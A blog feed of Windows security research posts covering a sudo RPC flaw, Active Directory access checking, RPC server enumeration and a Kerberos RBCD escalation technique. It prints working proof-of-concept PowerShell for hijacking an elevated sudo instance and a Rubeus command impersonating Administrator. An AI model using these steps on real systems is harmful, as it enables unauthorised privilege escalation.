Normal view

There are new articles available, click to refresh the page.
Before yesterdayTyranid's Lair

Sudo On Windows a Quick Rundown

By: tiraniddo
9 February 2024 at 09:10

Background

The Windows Insider Preview build 26052 just shipped with a sudo command, I thought I'd just take a quick peek to see what it does and how it does it. This is only a short write up of my findings, I think this code is probably still in early stages so I wouldn't want it to be treated too harshly. You can see the official announcement here.


To run a command using sudo you can just type:


C:\> sudo powershell.exe


The first thing to note, if you know anything about the security model of Windows (maybe buy my book, hint hint), is that there's no equivalent to SUID binaries. The only way to run a process with a higher privilege level is to get an existing higher privileged process to start it for you or you have sufficient permissions yourself though say SeImpersonatePrivilege or SeAssignPrimaryToken privilege and have an access token for a more privileged user. Since Vista, the main way of facilitating running more privileged code as a normal user is to use UAC. Therefore this is how sudo is doing it under the hood, it’s just spawning a process via UAC using the ShellExecute runas verb.


This is slightly disappointing as I was hoping the developers would have implemented a sudo service running at a higher privilege level to mediate access. Instead this is really just a fancy executable that you can elevate using the existing UAC mechanisms. 


The other sad thing is, as is Microsoft tradition, this is a sudo command in name only. It doesn’t support any policies which would allow a user to run specific commands elevated, either with a password requirement or without. It’ll just run anything you give it, and only if that user can pass a UAC elevation prompt.


There are four modes of operation that can be configured in system settings, why this needs to be a system setting I don’t really know. 


Initially sudo is disabled, running the sudo command just prints “Sudo is disabled on this machine. To enable it, go to the Developer Settings page in the Settings app”. This isn’t because of some fundamental limit on the behavior of the sudo implementation, instead it’s just an Enabled value in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo which is set to 0.


The next option (value 1) is to run the command in a new window. All this does is pass the command line you gave to sudo to ShellExecute with the runas verb. Therefore you just get the normal UAC dialog showing for that command. Considering the general move to using PowerShell for everything you can already do this easily enough with the command:


PS> Start-Process -Verb runas powershell.exe


The third and fourth options (value 2 and 3) are “With input disabled” and “Inline”. They’re more or less the same, they can run the command and attach it to the current console window by sharing the standard handles across to the new process. They use the same implementation behind the scenes to do this, a copy of the sudo binary is elevated with the command line and the calling PID of the non-elevated sudo. E.g. it might try and running the following command via UAC:


C:\> sudo elevate -p 1234 powershell.exe


Oddly, as we’ll see passing the PID and the command seems to be mostly unnecessary. At best it’s useful if you want to show more information about the command in the UAC dialog, but again as we’ll see this isn’t that useful.


The only difference between the two is “With input disabled” you can only output text from the elevated application, you can’t interact with it. Whereas the Inline mode allows you to run the command elevated in the same console session. This final mode has the obvious risk that the command is running elevated but attached to a low privileged window. Malicious code could inject keystrokes into that console window to control the privileged process. This was pointed out in the Microsoft blog post linked earlier. However, the blog does say that running it with input disabled mitigates this issue somewhat, as we’ll see it does not.

How It Really Works

For the “New Window” mode all sudo is doing is acting as a wrapper to call ShellExecute. For the inline modes it requires a bit more work. Again go back and read the Microsoft blog post, tbh it gives a reasonable overview of how it works. In the blog it has the following diagram, which I’ll reproduce here in case the link dies.


A diagram showing how sudo on windows works. Importantly it shows that there's an RPC channel between a normal sudo process and an elevated one.


What always gets me interested is where there’s an RPC channel involved. The reason a communications channel exists is due to the limitations of UAC, it very intentionally doesn’t allow you to attach elevated console processes to an existing low privileged console (grumble UAC is not a security boundary, but then why did this do this if it wasn’t grumble). It also doesn’t pass along a few important settings such as the current directory or the environment which would be useful features to have in a sudo like command. Therefore to do all that it makes sense for the normal privileged sudo to pass that information to the elevated version.


Let’s check out the RPC server using NtObjectManager:


PS> $rpc = Get-RpcServer C:\windows\system32\sudo.exe

PS> Format-RpcServer $rpc

[

  uuid(F691B703-F681-47DC-AFCD-034B2FAAB911),

  version(1.0)

]

interface intf_f691b703_f681_47dc_afcd_034b2faab911 {

    int server_PrepareFileHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_file)] HANDLE p1);

    int server_PreparePipeHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_pipe)] HANDLE p1);

    int server_DoElevationRequest([in] handle_t _hProcHandle, [in, system_handle(sh_process)] HANDLE p0, [in] int p1, [in, string] char* p2, [in, size_is(p4)] byte* p3[], [in] int p4, [in, string] char* p5, [in] int p6, [in] int p7, [in, size_is(p9)] byte* p8[], [in] int p9);

    void server_Shutdown([in] handle_t _hProcHandle);

}


Of the four functions, the key one is server_DoElevationRequest. This is what actually does the elevation. Doing a quick bit of analysis it seems the parameters correspond to the following:


HANDLE p0 - Handle to the calling process.

int p1 - The type of the new process, 2 being input disabled, 3 being inline.

char* p2 - The command line to execute (oddly, in ANSI characters)

byte* p3[] - Not sure.

int p4 - Size of p3.

char* p5 - The current directory.

int p6 - Not sure, seems to be set to 1 when called.

int p7 - Not sure, seems to be set to 0 when called.

byte* p8 - Pointer to the environment block to use.

int p9 - Length of environment block.


The RPC server is registered to use ncalrpc with the port name being sudo_elevate_PID where PID is just the value passed on the elevation command line for the -p argument. The PID isn’t used for determining the console to attach to, this is instead passed through the HANDLE parameter, and is only used to query its PID to pass to the AttachConsole API.


Also as said before as far as I can tell the command line you want to execute which is also passed to the elevated sudo is unused, it’s in fact this RPC call which is responsible for executing the command properly. This results in something interesting. The elevated copy of sudo doesn’t exit once the new process has started, it in fact keeps the RPC server open and will accept other requests for new processes to attach to. For example you can do the following to get a running elevated sudo instance to attach an elevated command prompt to the current PowerShell console:


PS> $c = Get-RpcClient $rpc

PS> Connect-RpcClient $c -EndpointPath sudo_elevate_4652

PS> $c.server_DoElevationRequest((Get-NtProcess -ProcessId $pid), 3, "cmd.exe", @(), 0, "C:\", 1, 0, @(), 0)


There are no checks for the caller’s PID to make sure it’s really the non-elevated sudo making the request. As long as the RPC server is running you can make the call. Finding the ALPC port is easy enough, you can just enumerate all the ALPC ports in \RPC Control to find them. 


A further interesting thing to note is that the type parameter (p1) doesn’t have to match the configured sudo mode in settings. Passing 2 to the parameter runs the command with input disabled, but passing any other value runs in the inline mode. Therefore even if sudo is configured in new window mode, there’s nothing stopping you running the elevated sudo manually, with a trusted Microsoft signed binary UAC prompt and then attaching the inline mode via the RPC service. E.g. you can run sudo using the following PowerShell:


PS> Start-Process -Verb runas -FilePath sudo -ArgumentList "elevate", "-p", 1111, "cmd.exe"


Fortunately sudo will exit immediately if it’s configured in disabled mode, so as long as you don’t change the defaults it’s fine I guess.


I find it odd that Microsoft would rely on UAC when UAC is supposed to be going away. Even more so that this command could have just been a PowerToy as other than the settings UI changes it really doesn’t need any integration with the OS to function. And in fact I’d argue that it doesn’t need those settings either. At any rate, this is no more a security risk than UAC already is, or is it…


Looking back at how the RPC server is registered can be enlightening:


RPC_STATUS StartRpcServer(RPC_CSTR Endpoint) {

  RPC_STATUS result;


  result = RpcServerUseProtseqEpA("ncalrpc", 

      RPC_C_PROTSEQ_MAX_REQS_DEFAULT, Endpoint, NULL);

  if ( !result )

  {

    result = RpcServerRegisterIf(server_sudo_rpc_ServerIfHandle, NULL, NULL);

    if ( !result )

      return RpcServerListen(1, RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 0);

  }

  return result;

}


Oh no, that’s not good. The code doesn’t provide a security descriptor for the ALPC port and it calls RpcServerRegisterIf to register the server, which should basically never be used. This old function doesn’t allow you to specify a security descriptor or a security callback. What this means is that any user on the same system can connect to this service and execute sudo commands. We can double check using some PowerShell:


PS> $as = Get-NtAlpcServer

PS> $sudo = $as | ? Name -Match sudo

PS> $sudo.Name

sudo_elevate_4652

PS> Format-NtSecurityDescriptor $sudo -Summary

<Owner> : BUILTIN\Administrators

<Group> : DESKTOP-9CF6144\None

<DACL>

Everyone: (Allowed)(None)(Connect|Delete|ReadControl)

NT AUTHORITY\RESTRICTED: (Allowed)(None)(Connect|Delete|ReadControl)

BUILTIN\Administrators: (Allowed)(None)(Full Access)

BUILTIN\Administrators: (Allowed)(None)(Full Access)


Yup, the DACL for the ALPC port has the Everyone group. It would even allow restricted tokens with the RESTRICTED SID set such as the Chromium GPU processes to access the server. This is pretty poor security engineering and you wonder how this got approved to ship in such a prominent form. 


The worst case scenario is if an admin uses this command on a shared server, such as a terminal server then any other user on the system could get their administrator access. Oh well, such is life…


I will give Microsoft props though for writing the code in Rust, at least most of it. Of course it turns out that the likelihood that it would have had any useful memory corruption flaws to be low even if they'd written it in ANSI C. This is a good lesson on why just writing in Rust isn't going to save you if you end up just introducing logical bugs instead.


Access Checking Active Directory

By: tiraniddo
17 July 2022 at 04:49

Like many Windows related technologies Active Directory uses a security descriptor and the access check process to determine what access a user has to parts of the directory. Each object in the directory contains an nTSecurityDescriptor attribute which stores the binary representation of the security descriptor. When a user accesses the object through LDAP the remote user's token is used with the security descriptor to determine if they have the rights to perform the operation they're requesting.

Weak security descriptors is a common misconfiguration that could result in the entire domain being compromised. Therefore it's important for an administrator to be able to find and remediate security weaknesses. Unfortunately Microsoft doesn't provide a means for an administrator to audit the security of AD, at least in any default tool I know of. There is third-party tooling, such as Bloodhound, which will perform this analysis offline but from reading the implementation of the checking they don't tend to use the real access check APIs and so likely miss some misconfigurations.

I wrote my own access checker for AD which is included in my NtObjectManager PowerShell module. I've used it to find a few vulnerabilities, such as CVE-2021-34470 which was an issue with Exchange's changes to AD. This works "online", as in you need to have an active account in the domain to run it, however AFAIK it should provide the most accurate results if what you're interested in what access an specific user has to AD objects. While the command is available in the module it's perhaps not immediately obvious how to use it an interpret the result, therefore I decide I should write a quick blog post about it.

A Complex Process

The access check process is mostly documented by Microsoft in [MS-ADTS]: Active Directory Technical Specification. Specifically in section 5.1.3. However, this leaves many questions unanswered. I'm not going to go through how it works in full either, but let me give a quick overview.  I'm going to assume you have a basic knowledge of the structure of the AD and its objects.

An AD object contains many resources that access might want to be granted or denied on for a particular user. For example you might want to allow the user to create only certain types of child objects, or only modify certain attributes. There are many ways that Microsoft could have implemented security, but they decided on extending the ACL format to introduce the object ACE. For example the ACCESS_ALLOWED_OBJECT_ACE structure adds two GUIDs to the normal ACCESS_ALLOWED_ACE

The first GUID, ObjectType indicates the type of object that the ACE applies to. For example this can be set to the schema ID of an attribute and the ACE will grant access to only that attribute nothing else. The second GUID, InheritedObjectType is only used during ACL inheritance. It represents the schema ID of the object's class that is allowed to inherit this ACE. For example if it's set to the schema ID of the computer class, then the ACE will only be inherited if such a class is created, it will not be if say a user object is created instead. We only need to care about the first of these GUIDs when doing an access check.

To perform an access check you need to use an API such as AccessCheckByType which supports checking the object ACEs. When calling the API you pass a list of object type GUIDs you want to check for access on. When processing the DACL if an ACE has an ObjectType GUID which isn't in the passed list it'll be ignored. Otherwise it'll be handled according to the normal access check rules. If the ACE isn't an object ACE then it'll also be processed.

If all you want to do is check if a local user has access to a specific object or attribute then it's pretty simple. Just get the access token for that user, add the object's GUID to the list and call the access check API. The resulting granted access can be one of the following specific access rights, not the names in parenthesis are the ones I use in the PowerShell module for simplicity:
  • ACTRL_DS_CREATE_CHILD (CreateChild) - Create a new child object
  • ACTRL_DS_DELETE_CHILD (DeleteChild) - Delete a child object
  • ACTRL_DS_LIST (List) - Enumerate child objects
  • ACTRL_DS_SELF (Self) - Grant a write-validated extended right
  • ACTRL_DS_READ_PROP (ReadProp) - Read an attribute
  • ACTRL_DS_WRITE_PROP (WriteProp) - Write an attribute
  • ACTRL_DS_DELETE_TREE (DeleteTree) - Delete a tree of objects
  • ACTRL_DS_LIST_OBJECT (ListObject) - List a tree of objects
  • ACTRL_DS_CONTROL_ACCESS (ControlAccess) - Grant a control extended right
You can also be granted standard rights such as READ_CONTROL, WRITE_DAC or DELETE which do what you'd expect them to do. However, if you want see what the maximum granted access on the DC would be it's slightly more difficult. We have the following problems:
  • The list of groups granted to a local user is unlikely to match what they're granted on the DC where the real access check takes place.
  • AccessCheckByType only returns a single granted access value, if we have a lot of object types to test it'd be quick expensive to call 100s if not 1000s of times for a single security descriptor.
While you could solve the first problem by having sufficient local privileges to manually create an access token and the second by using an API which returns a list of granted access such as AccessCheckByTypeResultList there's an "simpler" solution. You can use the Authz APIs, these allow you to manually build a security context with any groups you like without needing to create an access token and the AuthzAccessCheck API supports returning a list of granted access for each object in the type list. It just so happens that this API is the one used by the AD LDAP server itself.

Therefore to perform a "correct" maximum access check you need to do the following steps.
  1. Enumerate the user's group list for the DC from the AD. Local group assignments are stored in the directory's CN=Builtin container.
  2. Build an Authz security context with the group list.
  3. Read a directory object's security descriptor.
  4. Read the object's schema class and build a list of specific schema objects to check:
  • All attributes from the class and its super, auxiliary and dynamic auxiliary classes.
  • All allowable child object classes
  • All assignable control, write-validated and property set extended rights.
  • Convert the gathered schema information into the object type list for the access check.
  • Run the access check and handled the results.
  • Repeat from 3 for every object you want to check.
  • Trust me when I say this process is actually easier said than done. There's many nuances that just produce surprising results, I guess this is why most tooling just doesn't bother. Also my code includes a fair amount of knowledge gathered from reverse engineering the real implementation, but I'm sure I could have missed something.

    Using Get-AccessibleDsObject and Interpreting the Results

    Let's finally get to using the PowerShell command which is the real purpose of this blog post. For a simple check run the following command. This can take a while on the first run to gather information about the domain and the user.

    PS> Get-AccessibleDsObject -NamingContext Default
    Name   ObjectClass UserName       Modifiable Controllable
    ----   ----------- --------       ---------- ------------
    domain domainDNS   DOMAIN\alice   False      True

    This uses the NamingContext property to specify what object to check. The property allows you to easily specify the three main directories, Default, Configuration and Schema. You can also use the DistinguishedName property to specify an explicit DN. Also the Domain property is used to specify the domain for the LDAP server if you don't want to inspect the current user's domain. You can also specify the Recurse property to recursively enumerate objects, in this case we just access check the root object.

    The access check defaults to using the current user's groups, based on what they would be on the DC. This is obviously important, especially if the current user is a local administrator as they wouldn't be guaranteed to have administrator rights on the DC. You can specify different users to check either by SID using the UserSid property, or names using the UserName property. These properties can take multiple values which will run multiple checks against the list of enumerated objects. For example to check using the domain administrator you could do the following:

    PS> Get-AccessibleDsObject -NamingContext Default -UserName DOMAIN\Administrator
    Name   ObjectClass UserName             Modifiable Controllable
    ----   ----------- --------             ---------- ------------
    domain domainDNS   DOMAIN\Administrator True       True

    The basic table format for the access check results shows give columns, the common name of the object, it's schema class, the user that was checked and whether the access check resulted in any modifiable or controllable access being granted. Modifiable is things like being able to write attributes or create/delete child objects. Controllable indicates one or more controllable extended right was granted to the user, such as allowing the user's password to be changed.

    As this is PowerShell the access check result is an object with many properties. The following properties are probably the ones of most interest when determining what access is granted to the user.
    • GrantedAccess - The granted access when only specifying the object's schema class during the check. If an access is granted at this level it'd apply to all values of that type, for example if WriteProp is granted then any attribute in the object can be written by the user.
    • WritableAttributes - The list of attributes a user can modify.
    • WritablePropertySets - The list of writable property sets a user can modify. Note that this is more for information purposes, the modifiable attributes will also be in the WritableAttributes property which is going to be easier to inspect.
    • GrantedControl - The list of control extended rights granted to a user.
    • GrantedWriteValidated - The list of write validated extended rights granted to a user.
    • CreateableClasses - The list of child object classes that can be created.
    • DeletableClasses - The list of child object classes that can be deleted.
    • DistinguishedName - The full DN of the object.
    • SecurityDescriptor - The security descriptor used for the check.
    • TokenInfo - The user's information used in the check, such as the list of groups.
    The command should be pretty easy to use. That said it does come with a few caveats. First you can only use the command with direct access to the AD using a domain account. Technically there's no reason you couldn't implement a gatherer like Bloodhound and doing the access check offline, but I just don't. I've not tested it in weirder setups such as complex domain hierarchies or RODCs.

    If you're using a low-privileged user there's likely to be AD objects that you can't enumerate or read the security descriptor from. This means the results are going to depend on the user you use to enumerate with. The best results would be using a domain/enterprise administrator will full access to everything.

    Based on my testing when I've found an access being granted to a user that seems to be real, however it's possible I'm not always 100% correct or that I'm missing accesses. Also it's worth noting that just having access doesn't mean there's not some extra checking done by the LDAP server. For example there's an explicit block on creating Group Managed Service Accounts in Computer objects, even though that will seem to be a granted child object.

    Finding Running RPC Server Information with NtObjectManager

    By: tiraniddo
    26 June 2022 at 21:56

    When doing security research I regularly use my NtObjectManager PowerShell module to discover and call RPC servers on Windows. Typically I'll use the Get-RpcServer command, passing the name of a DLL or EXE file to extract the embedded RPC servers. I can then use the returned server objects to create a client to access the server and call its methods. A good blog post about how some of this works was written recently by blueclearjar.

    Using Get-RpcServer only gives you a list of what RPC servers could possibly be running, not whether they are running and if so in what process. This is where the RpcView does better, as it parses a process' in-memory RPC structures to find what is registered and where. Unfortunately this is something that I'm yet to implement in NtObjectManager

    However, it turns out there's various ways to get the running RPC server information which are provided by OS and the RPC runtime which we can use to get a more or less complete list of running servers. I've exposed all the ones I know about with some recent updates to the module. Let's go through the various ways you can piece together this information.

    NOTE some of the examples of PowerShell code will need a recent build of the NtObjectManager module. For various reasons I've not been updating the version of the PS gallery, so get the source code from github and build it yourself.

    RPC Endpoint Mapper

    If you're lucky this is simplest way to find out if a particular RPC server is running. When an RPC server is started the service can register an RPC interface with the function RpcEpRegister specifying the interface UUID and version along with the binding information with the RPC endpoint mapper service running in RPCSS. This registers all current RPC endpoints the server is listening on keyed against the RPC interface. 

    You can query the endpoint table using the RpcMgmtEpEltInqBegin and RpcMgmtEpEltInqNext APIs. I expose this through the Get-RpcEndpoint command. Running Get-RpcEndpoint with no parameters returns all interfaces the local endpoint mapper knows about as shown below.

    PS> Get-RpcEndpoint
    UUID                                 Version Protocol     Endpoint      Annotation
    ----                                 ------- --------     --------      ----------
    51a227ae-825b-41f2-b4a9-1ac9557a1018 1.0     ncacn_ip_tcp 49669         
    0497b57d-2e66-424f-a0c6-157cd5d41700 1.0     ncalrpc      LRPC-5f43...  AppInfo
    201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0     ncalrpc      LRPC-5f43...  AppInfo
    ...

    Note that in addition to the interface UUID and version the output shows the binding information for the endpoint, such as the protocol sequence and endpoint. There is also a free form annotation field, but that can be set to anything the server likes when it calls RpcEpRegister.

    The APIs also allow you to specify a remote server hosting the endpoint mapper. You can use this to query what RPC servers are running on a remote server, assuming the firewall doesn't block you. To do this you'd need to specify a binding string for the SearchBinding parameter as shown.

    PS> Get-RpcEndpoint -SearchBinding 'ncacn_ip_tcp:primarydc'
    UUID                                 Version Protocol     Endpoint     Annotation
    ----                                 ------- --------     --------     ----------
    d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0     ncacn_ip_tcp 49664
    5b821720-f63b-11d0-aad2-00c04fc324db 1.0     ncacn_ip_tcp 49688
    650a7e26-eab8-5533-ce43-9c1dfce11511 1.0     ncacn_np     \PIPE\ROUTER Vpn APIs
    ...

    The big issue with the RPC endpoint mapper is it only contains RPC interfaces which were explicitly registered against an endpoint. The server could contain many more interfaces which could be accessible, but as they weren't registered they won't be returned from the endpoint mapper. Registration will typically only be used if the server is using an ephemeral name for the endpoint, such as a random TCP port or auto-generated ALPC name.

    Pros:

    • Simple command to run to get a good list of running RPC servers.
    • Can be run against remote servers to find out remotely accessible RPC servers.
    Cons:
    • Only returns the RPC servers intentionally registered.
    • Doesn't directly give you the hosting process, although the optional annotation might give you a clue.
    • Doesn't give you any information about what the RPC server does, you'll need to find what executable it's hosted in and parse it using Get-RpcServer.

    Service Executable

    If the RPC servers you extract are in a registered system service executable then the module will try and work out what service that corresponds to by querying the SCM. The default output from the Get-RpcServer command will show this as the Service column shown below.

    PS> Get-RpcServer C:\windows\system32\appinfo.dll
    Name        UUID                                 Ver Procs EPs Service Running
    ----        ----                                 --- ----- --- ------- -------
    appinfo.dll 0497b57d-2e66-424f-a0c6-157cd5d41700 1.0 7     1   Appinfo True
    appinfo.dll 58e604e8-9adb-4d2e-a464-3b0683fb1480 1.0 1     1   Appinfo True
    appinfo.dll fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 1     1   Appinfo True
    appinfo.dll 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 1     1   Appinfo True
    appinfo.dll 201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0 7     1   Appinfo True

    The output also shows the appinfo.dll executable is the implementation of the Appinfo service, which is the general name for the UAC service. Note here that is also shows whether the service is running, but that's just for convenience. You can use this information to find what process is likely to be hosting the RPC server by querying for the service PID if it's running. 

    PS> Get-Win32Service -Name Appinfo
    Name    Status  ProcessId
    ----    ------  ---------
    Appinfo Running 6020

    The output also shows that each of the interfaces have an endpoint which is registered against the interface UUID and version. This is extracted from the endpoint mapper which makes it again only for convenience. However, if you pick an executable which isn't a service implementation the results are less useful:

    PS> Get-RpcServer C:\windows\system32\efslsaext.dll
    Name          UUID                   Ver Procs EPs Service Running      
    ----          ----                   --- ----- --- ------- -------      
    efslsaext.dll c681d488-d850-11d0-... 1.0 21    0           False

    The efslsaext.dll implements one of the EFS implementations, which are all hosted in LSASS. However, it's not a registered service so the output doesn't show any service name. And it's also not registered with the endpoint mapper so doesn't show any endpoints, but it is running.

    Pros:

    • If the executable's a service it gives you a good idea of who's hosting the RPC servers and if they're currently running.
    • You can get the RPC server interface information along with that information.
    Cons:
    • If the executable isn't a service it doesn't directly help.
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • Even if the service is running it might not have enabled the RPC servers.

    Enumerating Process Modules

    Extracting the RPC servers from an arbitrary executable is fine offline, but what if you want to know what RPC servers are running right now? This is similar to RpcView's process list GUI, you can look at a process and find all all the services running within it.

    It turns out there's a really obvious way of getting a list of the potential services running in a process, enumerate the loaded DLLs using an API such as EnumerateLoadedModules, and then run Get-RpcServer on each one to extract the potential services. To use the APIs you'd need to have at least read access to the target process, which means you'd really want to be an administrator, but that's no different to RpcView's limitations.

    The big problem is just because a module is loaded it doesn't mean the RPC server is running. For example the WinHTTP DLL has a built-in RPC server which is only loaded when running the WinHTTP proxy service, but the DLL could be loaded in any process which uses the APIs.

    To simplify things I expose this approach through the Get-RpcServer function with the ProcessId parameter. You can also use the ServiceName parameter to lookup a service PID if you're interested in a specific service.

    PS> Get-RpcEndpoint -ServiceName Appinfo
    Name        UUID                        Ver Procs EPs Service Running                ----        ----                        --- ----- --- ------- -------
    RPCRT4.dll  afa8bd80-7d8a-11c9-bef4-... 1.0 5     0           False
    combase.dll e1ac57d7-2eeb-4553-b980-... 0.0 0     0           False
    combase.dll 00000143-0000-0000-c000-... 0.0 0     0           False

    Pros:

    • You can determine all RPC servers which could be potentially running for an arbitrary process.
    Cons:
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • You can't directly enumerate the module list, except for the main executable, from a protected process (there's are various tricks do so, but out of scope here).

    Asking an RPC Endpoint Nicely

    The final approach is just to ask an RPC endpoint nicely to tell you what RPC servers is supports. We don't need to go digging into the guts of a process to do this, all we need is the binding string for the endpoint we want to query and then call the RpcMgmtInqIfIds API.

    This will only return the UUID and version of the RPC server that's accessible from the endpoint, not the RPC server information. But it will give you an exact list of all supported RPC servers, in fact it's so detailed it'll give you all the COM interfaces that the process is listening on as well. To query this list you only need to access to the endpoint transport, not the process itself.

    How do you get the endpoints though? One approach is if you do have access to the process you can enumerate its server ALPC ports by getting a list of handles for the process, finding the ports with the \RPC Control\ prefix in their name and then using that to form the binding string. This approach is exposed through Get-RpcEndpoint's ProcessId parameter. Again it also supports a ServiceName parameter to simplify querying services.

    PS> Get-RpcEndpoint -ServiceName AppInfo
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    If you don't have access to the process you can do it in reverse by enumerating potential endpoints and querying each one. For example you could enumerate the \RPC Control object directory and query each one. Since Windows 10 19H1 ALPC clients can now query the server's PID, so you can not only find out the exposed RPC servers but also what process they're running in. To query from the name of an ALPC port use the AlpcPort parameter with Get-RpcEndpoint.

    PS> Get-RpcEndpoint -AlpcPort LRPC-0ee3261d56342eb7ac
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    Pros:

    • You can determine exactly what RPC servers are running in a process.
    Cons:
    • You can't directly determine what the RPC server does as the list gives you no information about which module is hosting it.

    Combining Approaches

    Obviously no one approach is perfect. However, you can get most of the way towards RpcView process list by combining the module enumeration approach with asking the endpoint nicely. For example, you could first get a list of potential interfaces by enumerating the modules and parsing the RPC servers, then filter that list to only the ones which are running by querying the endpoint directly. This will also get you a list of the ALPC server ports that the RPC server is running on so you can directly connect to it with a manually built client. And example script for doing this is on github.

    We are still missing some crucial information that RpcView can access such as the interface registration flags from any approach. Still, hopefully that gives you a few ways to approach analyzing the RPC attack surface of the local system and determining what endpoints you can call.

    Exploiting RBCD Using a Normal User Account*

    By: tiraniddo
    14 May 2022 at 02:29

    * Caveats apply.

    Resource Based Constrained Delegate (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post is a devious way of exploiting Kerberos to elevate privileged on a local  Windows machine. All it requires is write access to local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to add another account's SID. You can then use that account with the Services For User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain including local administrators. From there you can create a new service or whatever else you need to do.

    The key is how you write to the LDAP server under the local computer's domain account. There's been various approaches usually abusing authentication relay. For example, I described one relay vector which abused DCOM. Someone else has then put this together in a turnkey tool, KrbRelayUp

    One additional criteria for this to work is having access to another computer account to perform the attack. Well this isn't strictly true, there's the Shadow Credentials attack which allows you to reuse the same local computer account, but in general you need a computer account you control. Normally this isn't a problem, as the DC allows normal users to create new computer accounts up to a limit set by the domain's ms-DS-MachineAccountQuota attribute value. This attribute defaults to 10, but an administrator could set it to 0 and block the attack, which is probably recommend.

    But I wondered why this wouldn't work as a normal user. The msDS-AllowedToActOnBehalfOfOtherIdentity attribute just needs the SID for the account to be allowed to delegate to the computer. Why can't we just add the user's SID and perform the S4U dance? To give us the best chance I'll assume we have knowledge of a user's password, how you get this is entirely up to you. Running the attack through Rubeus shows our problem.

    PS C:\> Rubeus.exe s4u /user:charlie /domain:domain.local /dc:primarydc.domain.local /rc4:79bf93c9501b151506adc21ba0397b33 /impersonateuser:Administrator /msdsspn:cifs/WIN10TEST.domain.local

       ______        _
      (_____ \      | |
       _____) )_   _| |__  _____ _   _  ___
      |  __  /| | | |  _ \| ___ | | | |/___)
      | |  \ \| |_| | |_) ) ____| |_| |___ |
      |_|   |_|____/|____/|_____)____/(___/
      v2.0.3
    [*] Action: S4U
    [*] Using rc4_hmac hash: 79bf93c9501b151506adc21ba0397b33
    [*] Building AS-REQ (w/ preauth) for: 'domain.local\charlie'
    [*] Using domain controller: 10.0.0.10:88
    [+] TGT request successful!
    [*] base64(ticket.kirbi):
          doIFc...
    [*] Action: S4U
    [*] Building S4U2self request for: '[email protected]'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2self request to 10.0.0.10:88
    [X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
    [X] S4U2Self failed, unable to perform S4U2Proxy.

    We don't even get past the first S4U2Self stage of the attack, it fails with a KDC_ERR_S_PRINCIPAL_UNKNOWN error. This error typically indicates the KDC doesn't know what encryption key to use for the generated ticket. If you add an SPN to the user's account however it all succeeds. This would imply it's not a problem with a user account per-se, but instead just a problem of the KDC not being able to select the correct key.

    Technically speaking there should be no reason that the KDC couldn't use the user's long term key if you requested a ticket for their UPN, but it doesn't (contrary to an argument I had on /r/netsec the other day with someone who was adamant that SPN's are a convenience, not a fundamental requirement of Kerberos). 

    So what to do? There is a way of getting a ticket encrypted for a UPN by using the User 2 User (U2U) extension. Would this work here? Looking at the Rubeus code it seems requesting a U2U S4U2Self ticket is supported, but the parameters are not set for the S4U attack. Let's set those parameters to request a U2U ticket and see if it works.

    [+] S4U2self success!
    [*] Got a TGS for 'Administrator' to '[email protected]'
    [*] base64(ticket.kirbi): doIF...bGll

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [X] KRB-ERROR (13) : KDC_ERR_BADOPTION

    Okay, we're getting closer. The S4U2Self request was successful, unfortunately the S4U2Proxy request was not, failing with a KDC_ERR_BADOPTION error. After a bit of playing around this is almost certainly because the KDC can't decrypt the ticket sent in the S4U2Proxy request. It'll try the user's long term key, but that will obviously fail. I tried to see if I could send the user's TGT with the request (in addition to the S4U2Self service ticket) but it still failed. Is this not going to be possible?

    Thinking about this a bit more, I wondered, could I decrypt the S4U2Self ticket and then encrypt with the long term key I already know for the user? Technically speaking this would create a valid Kerberos ticket, however it wouldn't create a valid PAC. This is because the PAC contains a Server Signature which is a HMAC of the PAC using the key used to encrypt the ticket. The KDC checks this to ensure the PAC hasn't been modified or put into a new ticket, and if it's incorrect it'll fail the request.

    As we know the key, we could just update this value. However, the Server Signature is protected by the KDC Signature which is a HMAC keyed with the KDC's own key. We don't know this key and so we can't update this second signature to match the modified Server Signature. Looks like we're stuck.

    Still, what would happen if the user's long term key happened to match the TGT session key we used to encrypt the S4U2Self ticket? It's pretty unlikely to happen by chance, but with knowledge of the user's password we could conceivably change the user's password on the DC between the S4U2Self and the S4U2Proxy requests so that when submitting the ticket the KDC can decrypt it and perhaps we can successfully get the delegated ticket.

    As we know the TGT's session key, one obvious approach would be to "crack" the hash value back to a valid Unicode password. For AES keys I think this is going to be difficult and even if successful could be time consuming. However, RC4 keys are just a MD4 hash with no additional protection against brute force cracking. Fortunately the code in Rubeus defaults to requesting an RC4 session key for the TGT, and MS have yet to disable RC4 by default in Windows domains. This seems like it might be doable, even if it takes a long time. We would also need the "cracked" password to be valid per the domain's password policy which adds extra complications.

